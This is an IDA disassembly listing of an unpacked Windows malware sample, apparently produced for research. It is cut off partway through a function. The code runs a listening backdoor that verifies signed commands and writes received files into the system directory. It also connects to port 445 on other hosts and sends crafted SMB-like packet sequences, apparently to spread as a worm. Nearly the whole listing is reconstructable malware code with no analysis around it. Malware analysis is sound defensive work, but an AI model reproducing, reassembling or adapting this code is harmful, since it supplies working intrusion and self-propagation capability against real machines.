;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 43878AADF2B218BCCE223712C01AABE6
; File Name : u:\work\43878aadf2b218bcce223712c01aabe6_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31300000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31301000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31301000 dd 77DD590Bh ; DATA XREF: sub_313033C3+1A�r
dword_31301004 dd 77DD59F0h ; DATA XREF: sub_313033C3+38�r
dword_31301008 dd 77DD23D7h ; DATA XREF: sub_3130336A+3E�r
dword_3130100C dd 77DD22EAh ; DATA XREF: sub_31303335+14�r
; sub_3130336A+1D�r
dword_31301010 dd 77DD5C55h ; DATA XREF: sub_31303335+24�r
dword_31301014 dd 77DD189Ah ; DATA XREF: sub_31303335+2D�r
; sub_3130336A+4E�r ...
dword_31301018 dd 77E2A571h ; DATA XREF: sub_31302E37+BB�r
dword_3130101C dd 77DE089Eh ; DATA XREF: sub_31301228+90�r
dword_31301020 dd 77DE07A3h ; DATA XREF: sub_31301228+A2�r
dword_31301024 dd 77DE0D79h ; DATA XREF: sub_31301228+C8�r
dword_31301028 dd 77DE0343h ; DATA XREF: sub_31301228+DB�r
; sub_31301228+FD�r
dword_3130102C dd 77DE0AF0h ; DATA XREF: sub_3130120D+6�r
dword_31301030 dd 77DE042Eh ; DATA XREF: sub_3130120D+11�r
dword_31301034 dd 77DDEBA2h ; DATA XREF: sub_313011B9+2�r
dword_31301038 dd 77DE0BB2h ; DATA XREF: sub_313011B9+41�r
align 10h
dword_31301040 dd 77E79E34h ; DATA XREF: sub_3130372B+B�r
dword_31301044 dd 77E7980Ah ; DATA XREF: sub_31303717+D�r
dword_31301048 dd 77E7A099h ; DATA XREF: sub_31303641+15�r
dword_3130104C dd 77E76A2Eh ; DATA XREF: sub_31303641+7F�r
dword_31301050 dd 77E6BD13h ; DATA XREF: sub_31303575+71�r
dword_31301054 dd 77E684C6h ; DATA XREF: sub_31303575+B0�r
dword_31301058 dd 77EBB1E7h ; DATA XREF: sub_313037AE�r
dword_3130105C dd 77EBA595h ; DATA XREF: sub_313037A8�r
dword_31301060 dd 77E616B4h ; DATA XREF: sub_31303416+9B�r
dword_31301064 dd 77EBA6E9h ; DATA XREF: sub_313037A2�r
dword_31301068 dd 77E75CEBh ; DATA XREF: sub_31302E37+D5�r
dword_3130106C dd 77E73628h ; DATA XREF: UPX0:31302DCB�r
; sub_31303575+F�r
dword_31301070 dd 77E75CB5h ; DATA XREF: UPX0:31302DF5�r
; sub_31303575+C3�r
dword_31301074 dd 77E793EFh ; DATA XREF: sub_31302C49+6E�r
dword_31301078 dd 77E78B82h ; DATA XREF: sub_31302C49+92�r
dword_3130107C dd 77E777EFh ; DATA XREF: sub_31302BFB+2A�r
; sub_31303112+3E�r ...
dword_31301080 dd 77E61BB8h ; DATA XREF: sub_31302B15+38�r
dword_31301084 dd 77E7C2C4h ; DATA XREF: sub_31302A9B+8�r
dword_31301088 dd 77E76432h, 77E7513Ch ; DATA XREF: sub_31302755+14E�r
; sub_31302755:loc_3130299E�r ...
dword_31301090 dd 77E73167h ; DATA XREF: sub_313011A0+F�r
; UPX0:313025A3�r ...
dword_31301094 dd 77F5157Dh ; DATA XREF: sub_31301228:loc_313012FA�r
; sub_31301228:loc_31301309�r ...
dword_31301098 dd 77E77C4Ch ; DATA XREF: sub_31301228+1E�r
dword_3130109C dd 77E61608h ; DATA XREF: sub_31301228+10�r
; sub_313023D4+A�r
dword_313010A0 dd 77E77963h ; DATA XREF: sub_31301341+116�r
; sub_31301562+66�r ...
dword_313010A4 dd 77E79D8Ch ; DATA XREF: sub_31301341+F2�r
; sub_3130263B+ED�r
dword_313010A8 dd 77E7A837h ; DATA XREF: sub_31301341+83�r
; sub_3130263B+8F�r ...
dword_313010AC dd 77E73BEFh ; DATA XREF: sub_31301341+69�r
; sub_31301631+4F�r ...
dword_313010B0 dd 77E705C5h ; DATA XREF: sub_31301341+4C�r
; sub_31301341+14B�r
dword_313010B4 dd 77E704FCh ; DATA XREF: sub_31301341+3F�r
; sub_31301341+13E�r ...
dword_313010B8 dd 77E73C49h ; DATA XREF: sub_313014C6+8E�r
; sub_31302BFB+42�r ...
dword_313010BC dd 77E74A3Bh ; DATA XREF: sub_313014C6+1B�r
dword_313010C0 dd 77E79D5Bh ; DATA XREF: sub_31301562+C2�r
; sub_31302E23+8�r
dword_313010C4 dd 77E7AC37h ; DATA XREF: sub_31301562+B1�r
; sub_31302AAA+12�r ...
dword_313010C8 dd 77E737DEh ; DATA XREF: sub_31301562+98�r
; sub_31302E37+14�r
dword_313010CC dd 77E74672h ; DATA XREF: sub_31301631+253�r
; sub_31301631+272�r ...
dword_313010D0 dd 77E61BE6h ; DATA XREF: sub_31301631+16C�r
; sub_31301E60+A4�r ...
dword_313010D4 dd 77E79C90h ; DATA XREF: sub_31301B98+4D�r
dword_313010D8 dd 77E7A5FDh ; DATA XREF: sub_31301B98+13�r
; sub_31301C20+2C�r
dword_313010DC dd 77E79F93h ; DATA XREF: sub_31301B98+D�r
; sub_31301C20+26�r ...
dword_313010E0 dd 77E61A90h ; DATA XREF: sub_31301C20+BC�r
dword_313010E4 dd 77E706B7h ; DATA XREF: sub_31301C20+8A�r
; sub_31303416+92�r
dword_313010E8 dd 77E7751Ah ; DATA XREF: sub_31302260+13�r
; sub_31302755+1E�r ...
dword_313010EC dd 77E74155h ; DATA XREF: UPX0:31302472�r
; sub_3130263B+3D�r ...
dd 0
dword_313010F4 dd 77C41FA0h ; DATA XREF: sub_3130379C�r
dword_313010F8 dd 77C41FB0h ; DATA XREF: sub_31303796�r
dword_313010FC dd 77C1BE00h ; DATA XREF: sub_31302755+1F6�r
dword_31301100 dd 77C35280h ; DATA XREF: sub_313023D4+24�r
; sub_31302A6D+22�r
; ---------------------------------------------------------------------------
loc_31301104: ; DATA XREF: sub_31303790�r
xor [edx], bl
retn 0D877h ; DATA XREF: sub_313037B4:loc_31303780�r
; ---------------------------------------------------------------------------
db 1Ah, 0C2h, 77h
dword_3130110C dd 77C43AB0h ; DATA XREF: sub_31301E60+13B�r
; sub_313020A2+16�r ...
dword_31301110 dd 77C43500h ; DATA XREF: sub_31301D2B+37�r
; sub_31302755+BA�r
dword_31301114 dd 77C43710h ; DATA XREF: sub_3130374A�r
dword_31301118 dd 77C43490h ; DATA XREF: sub_31303744�r
dword_3130111C dd 77C42E10h ; DATA XREF: sub_3130373E�r
dword_31301120 dd 77C3528Dh ; DATA XREF: sub_31301228+103�r
; sub_313021F7+C�r ...
align 8
dword_31301128 dd 77D4BDCAh ; DATA XREF: sub_31301C20+5D�r
dword_3130112C dd 77D4456Bh ; DATA XREF: sub_31301C20+67�r
dword_31301130 dd 77D45CBCh ; DATA XREF: sub_31301C20+7A�r
dword_31301134 dd 77D4C96Ah ; DATA XREF: sub_31301631+62�r
; sub_31301E60+8D�r ...
dd 0
dword_3130113C dd 762211EFh ; DATA XREF: sub_31302BE5+8�r
; sub_31303256+2B�r
dword_31301140 dd 7620AFB6h ; DATA XREF: sub_3130263B+18�r
dword_31301144 dd 7620BD61h ; DATA XREF: sub_3130263B+DB�r
dword_31301148 dd 76214750h ; DATA XREF: sub_3130263B+A9�r
align 10h
dword_31301150 dd 71AB41DAh ; DATA XREF: sub_31302D8D+10�r
dword_31301154 dd 71AB12A7h ; DATA XREF: sub_31302F59+5B�r
dword_31301158 dd 71AB32CAh ; DATA XREF: sub_31302BA6+C�r
dword_3130115C dd 71AB1740h ; DATA XREF: sub_31302BA6+17�r
dword_31301160 dd 71AB12F8h ; DATA XREF: sub_31302B6B+7�r
dword_31301164 dd 71AB2BBFh ; DATA XREF: sub_31302B6B+1E�r
; sub_31302BA6+25�r
dword_31301168 dd 71AB1890h ; DATA XREF: sub_31302260+50�r
dword_3130116C dd 71AB401Ch ; DATA XREF: sub_31301631+44�r
dword_31301170 dd 71AB3E5Dh ; DATA XREF: sub_31301631+15D�r
; sub_31301E60+46�r
dword_31301174 dd 71AB8629h ; DATA XREF: sub_31301631+550�r
; sub_31302BFB+33�r
dword_31301178 dd 71AB3C22h ; DATA XREF: sub_31301562+10�r
; sub_31301631+2B�r ...
dword_3130117C dd 71AB1746h ; DATA XREF: sub_31301562+38�r
; sub_31301631+147�r ...
dword_31301180 dd 71AB3ECEh ; DATA XREF: sub_31301562+4B�r
; sub_31302C49+100�r ...
dword_31301184 dd 71AB5DE2h ; DATA XREF: sub_31301562+60�r
; sub_31302C49+10D�r ...
dword_31301188 dd 71AB868Dh ; DATA XREF: sub_31301562+7E�r
; sub_31302C49+120�r ...
dword_3130118C dd 71AB1A6Dh ; DATA XREF: sub_313014C6+86�r
; sub_31301631+559�r ...
dword_31301190 dd 71AB5690h ; DATA XREF: sub_31301228+3B�r
; sub_31301341+D9�r ...
dword_31301194 dd 71AB1AF4h ; DATA XREF: sub_31301228+111�r
; sub_31301341+95�r ...
align 10h
; =============== S U B R O U T I N E =======================================
sub_313011A0 proc near ; CODE XREF: sub_313014C6+32�p
push esi
mov esi, ecx
push offset aCont ; "cont"
and dword ptr [esi], 0
lea eax, [esi+4]
push eax
call dword_31301090 ; lstrcpy
mov eax, esi
pop esi
retn
sub_313011A0 endp
; =============== S U B R O U T I N E =======================================
sub_313011B9 proc near ; CODE XREF: sub_313014C6+3A�p
push ebx
push ebp
mov ebx, dword_31301034
push esi
push edi
xor ebp, ebp
mov edi, ecx
push ebp
push 1
push ebp
lea esi, [edi+10h]
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_313011E8
push 8
push 1
push ebp
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_313011E8
push 1
pop eax
jmp short loc_31301208
; ---------------------------------------------------------------------------
loc_313011E8: ; CODE XREF: sub_313011B9+1B�j
; sub_313011B9+28�j
add edi, 14h
push edi
push ebp
push ebp
push 114h
push offset dword_31304000
push dword ptr [esi]
call dword_31301038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_31301208: ; CODE XREF: sub_313011B9+2D�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_313011B9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3130120D proc near ; CODE XREF: sub_313014C6+7E�p
push esi
mov esi, ecx
push dword ptr [esi+14h]
call dword_3130102C ; CryptDestroyKey
push 0
push dword ptr [esi+10h]
call dword_31301030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3130120D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31301228 proc near ; CODE XREF: sub_313014C6+46�p
var_28 = byte ptr -28h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
lea eax, [ebp+var_28]
push edi
mov [ebp+var_8], ecx
push eax
call dword_3130109C ; GetSystemTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_28]
push eax
call dword_31301098 ; SystemTimeToFileTime
mov esi, 4000h
push esi
call sub_31303717
mov ebx, [ebp+arg_0]
pop ecx
mov edi, eax
push 0
push esi
push edi
push dword ptr [ebx]
call dword_31301190 ; recv
lea esi, [edi+8]
push 8
lea eax, [ebp+var_10]
push esi
push eax
call sub_3130373E ; memcpy
mov ecx, [ebp+var_10]
mov eax, [ebp+var_C]
add esp, 0Ch
sub ecx, [ebp+var_18]
sbb eax, [ebp+var_14]
cmp eax, 8
jg short loc_31301309
jl short loc_31301296
cmp ecx, 61C46800h
ja short loc_31301309
loc_31301296: ; CODE XREF: sub_31301228+64�j
cmp eax, 0FFFFFFF7h
jl short loc_31301309
jg short loc_313012A5
cmp ecx, 9E3B9800h
jb short loc_31301309
loc_313012A5: ; CODE XREF: sub_31301228+73�j
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_8]
push 0
push 0
push 8003h
push dword ptr [eax+10h]
call dword_3130101C ; CryptCreateHash
test eax, eax
jz short loc_313012FA
push 0
push 8
push esi
push [ebp+var_4]
call dword_31301020 ; CryptHashData
test eax, eax
jz short loc_313012FA
mov eax, [edi+10h]
cmp eax, 2800h
ja short loc_313012FA
mov ecx, [ebp+var_8]
xor esi, esi
push esi
push esi
push dword ptr [ecx+14h]
push eax
lea eax, [edi+14h]
push eax
push [ebp+var_4]
call dword_31301024 ; CryptVerifySignatureA
test eax, eax
jnz short loc_31301322
loc_313012FA: ; CODE XREF: sub_31301228+98�j
; sub_31301228+AA�j ...
call dword_31301094 ; RtlGetLastWin32Error
push [ebp+var_4]
call dword_31301028 ; CryptDestroyHash
loc_31301309: ; CODE XREF: sub_31301228+62�j
; sub_31301228+6C�j ...
call dword_31301094 ; RtlGetLastWin32Error
push 2
pop esi
loc_31301312: ; CODE XREF: sub_31301228+117�j
push edi
call sub_3130372B
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31301322: ; CODE XREF: sub_31301228+D0�j
push [ebp+var_4]
call dword_31301028 ; CryptDestroyHash
call dword_31301120 ; rand
push esi
push 4
push edi
mov [edi], eax
push dword ptr [ebx]
call dword_31301194 ; send
jmp short loc_31301312
sub_31301228 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31301341 proc near ; CODE XREF: sub_313014C6+6A�p
var_220 = byte ptr -220h
var_118 = byte ptr -118h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 220h
cmp [ebp+arg_8], 8
push ebx
push esi
push edi
jge short loc_31301360
push 0
push [ebp+arg_8]
push [ebp+arg_4]
jmp loc_313014B8
; ---------------------------------------------------------------------------
loc_31301360: ; CODE XREF: sub_31301341+10�j
mov esi, [ebp+arg_4]
mov ebx, 104h
mov eax, [esi]
lea edi, [esi+8]
test eax, eax
mov [ebp+arg_4], eax
jnz loc_31301471
lea eax, [ebp+var_220]
push ebx
push eax
call dword_313010B4 ; GetSystemDirectoryA
lea eax, [ebp+var_220]
push eax
call dword_313010B0 ; SetCurrentDirectoryA
mov eax, [edi]
push ebx
mov [ebp+arg_8], eax
mov eax, [edi+4]
mov [ebp+var_4], eax
lea eax, [edi+8]
push eax
lea eax, [ebp+var_118]
push eax
call dword_313010AC ; lstrcpyn
xor eax, eax
push eax
push eax
push 2
push eax
push eax
lea eax, [ebp+var_118]
push 40000000h
push eax
call dword_313010A8 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_3130145F
mov ebx, dword_31301194
push 0
push 8
push esi
push [ebp+arg_0]
mov dword ptr [esi+4], 1
call ebx ; send
mov eax, [ebp+arg_8]
xor edx, edx
div [ebp+var_4]
xor edx, edx
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
div [ebp+var_4]
test edx, edx
jz short loc_31301407
inc [ebp+arg_4]
loc_31301407: ; CODE XREF: sub_31301341+C1�j
and [ebp+var_8], 0
cmp [ebp+arg_4], 0
jle short loc_31301454
loc_31301411: ; CODE XREF: sub_31301341+111�j
push 0
push [ebp+var_4]
push edi
push [ebp+arg_0]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
mov [ebp+arg_8], eax
jz short loc_31301454
lea ecx, [ebp+var_10]
push 0
push ecx
push eax
push edi
push [ebp+var_C]
call dword_313010A4 ; WriteFile
mov eax, [ebp+arg_8]
push 0
push 8
push esi
push [ebp+arg_0]
mov [esi+4], eax
call ebx ; send
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jl short loc_31301411
loc_31301454: ; CODE XREF: sub_31301341+CE�j
; sub_31301341+E5�j
push [ebp+var_C]
call dword_313010A0 ; CloseHandle
jmp short loc_313014C1
; ---------------------------------------------------------------------------
loc_3130145F: ; CODE XREF: sub_31301341+8F�j
and dword ptr [esi+4], 0
push 0
push 8
push esi
push [ebp+arg_0]
call dword_31301194 ; send
loc_31301471: ; CODE XREF: sub_31301341+31�j
cmp [ebp+arg_4], 1
jnz short loc_313014A0
lea eax, [ebp+var_118]
push ebx
push eax
call dword_313010B4 ; GetSystemDirectoryA
lea eax, [ebp+var_118]
push eax
call dword_313010B0 ; SetCurrentDirectoryA
push 0
push 4
push esi
push [ebp+arg_0]
call dword_31301194 ; send
loc_313014A0: ; CODE XREF: sub_31301341+134�j
cmp [ebp+arg_4], 3
jnz short loc_313014C1
push dword ptr [edi]
add edi, 4
push edi
call sub_31302B15
pop ecx
pop ecx
push 0
push 4
push esi
loc_313014B8: ; CODE XREF: sub_31301341+1A�j
push [ebp+arg_0]
call dword_31301194 ; send
loc_313014C1: ; CODE XREF: sub_31301341+11C�j
; sub_31301341+163�j
pop edi
pop esi
pop ebx
leave
retn
sub_31301341 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_313014C6 proc near ; DATA XREF: sub_31301562+AA�o
var_30 = byte ptr -30h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
push esi
push edi
call sub_31302A6D
mov esi, [ebp+arg_0]
push 6
pop ecx
lea edi, [ebp+var_18]
rep movsd
push [ebp+var_4]
call dword_313010BC ; SetEvent
mov esi, 10000h
push esi
call sub_31303717
pop ecx
mov edi, eax
lea ecx, [ebp+var_30]
call sub_313011A0
lea ecx, [ebp+var_30]
call sub_313011B9
lea eax, [ebp+var_18]
lea ecx, [ebp+var_30]
push eax
call sub_31301228
test eax, eax
jnz short loc_3130153A
loc_31301515: ; CODE XREF: sub_313014C6+72�j
push 0
push esi
push edi
push [ebp+var_18]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_3130153A
test eax, eax
jz short loc_3130153A
push eax
push edi
push [ebp+var_18]
call sub_31301341
add esp, 0Ch
jmp short loc_31301515
; ---------------------------------------------------------------------------
loc_3130153A: ; CODE XREF: sub_313014C6+4D�j
; sub_313014C6+5F�j ...
push edi
call sub_3130372B
pop ecx
lea ecx, [ebp+var_30]
call sub_3130120D
push [ebp+var_18]
call dword_3130118C ; closesocket
push 0
call dword_313010B8 ; ExitThread
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_313014C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_31301562 proc near ; DATA XREF: sub_31302E37+90�o
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 44h
push ebx
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_31301178 ; socket
mov [ebp+var_4], eax
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_31303744 ; memset
add esp, 0Ch
mov [ebp+var_1C], 2
mov [ebp+var_18], esi
loc_31301593: ; CODE XREF: sub_31301562+59�j
lea eax, [esi+0BFBh]
push eax
call dword_3130117C ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_1C]
push 10h
push eax
push [ebp+var_4]
call dword_31301180 ; bind
test eax, eax
jz short loc_313015BD
inc esi
cmp esi, 0Ah
jl short loc_31301593
loc_313015BD: ; CODE XREF: sub_31301562+53�j
push 32h
push [ebp+var_4]
call dword_31301184 ; listen
mov ebx, dword_313010A0
loc_313015CE: ; CODE XREF: sub_31301562+CD�j
lea eax, [ebp+var_8]
mov [ebp+var_8], 10h
push eax
lea eax, [ebp+var_2C]
push eax
push [ebp+var_4]
call dword_31301188 ; accept
lea esi, [ebp+var_2C]
lea edi, [ebp+var_40]
mov [ebp+var_44], eax
movsd
movsd
movsd
movsd
xor esi, esi
push esi
push esi
push 1
push esi
call dword_313010C8 ; CreateEventA
mov [ebp+var_30], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_44]
push esi
push eax
push offset sub_313014C6
push esi
push esi
call dword_313010C4 ; CreateThread
push eax
call ebx ; CloseHandle
push 3E8h
push [ebp+var_30]
call dword_313010C0 ; WaitForSingleObject
push [ebp+var_30]
call ebx ; CloseHandle
jmp short loc_313015CE
sub_31301562 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31301631 proc near ; CODE XREF: sub_313030B2+35�p
; sub_31303112+47�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31303750
mov eax, dword_31304B0C
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31304B10
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31301178 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31301B91
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3130116C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_313010AC ; lstrcpyn
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31304B00
push eax
call dword_31301134 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_313016A4: ; CODE XREF: sub_31301631+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_313016A4
push 60h
lea eax, [ebp+var_E4]
push offset dword_31304614
push eax
call sub_3130373E ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_3130374A ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_3130373E ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_3130374A ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_3130373E ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_3130374A ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_3130373E ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_3130374A ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_3130373E ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31303744 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31303744 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_3130117C ; htons
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31301170 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31301B87
mov esi, dword_313010D0
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_31301194
push 89h
push offset dword_313043FC
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31301B7C
push 0
push 0A8h
push offset dword_31304488
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31301B7C
push 0
push 0DEh
push offset dword_31304534
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31301B7C
cmp eax, 46h
jl loc_31301B7C
cmp [ebp+var_730], 31h
jnz loc_31301A27
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31303744 ; memset
add esp, 0Ch
push offset loc_31304120
call dword_313010CC ; lstrlen
push eax
lea eax, [ebp+var_EA4]
push offset loc_31304120
push eax
call sub_3130373E ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_313010CC ; lstrlen
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_3130373E ; memcpy
mov eax, dword_31304A40
add esp, 0Ch
mov [ebp+var_798], eax
loc_313018C8: ; CODE XREF: sub_31301631+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31301B7C
push 0
push 68h
push offset dword_31304678
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31301B7C
push 0
push 0A0h
push offset dword_313046E4
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31301B7C
cmp [ebp+arg_0], 0
jz loc_31301B17
push 68h
lea eax, [ebp+var_89E4]
push offset dword_3130489C
push eax
call sub_3130373E ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_3130373E ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_31304908
push eax
call sub_3130373E ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_3130373E ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_3130497C
push eax
call sub_3130373E ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31301B7C
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_31301B6F
; ---------------------------------------------------------------------------
loc_31301A27: ; CODE XREF: sub_31301631+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31303744 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31304A7C
push eax
call sub_3130373E ; memcpy
push offset loc_31304120
call sub_3130374A ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset loc_31304120
push eax
call sub_3130373E ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_31304AF8
push eax
call sub_3130373E ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31304A7C
push eax
call sub_3130373E ; memcpy
add esp, 40h
push offset loc_31304120
call sub_3130374A ; strlen
push eax
lea eax, [ebp+var_21B0]
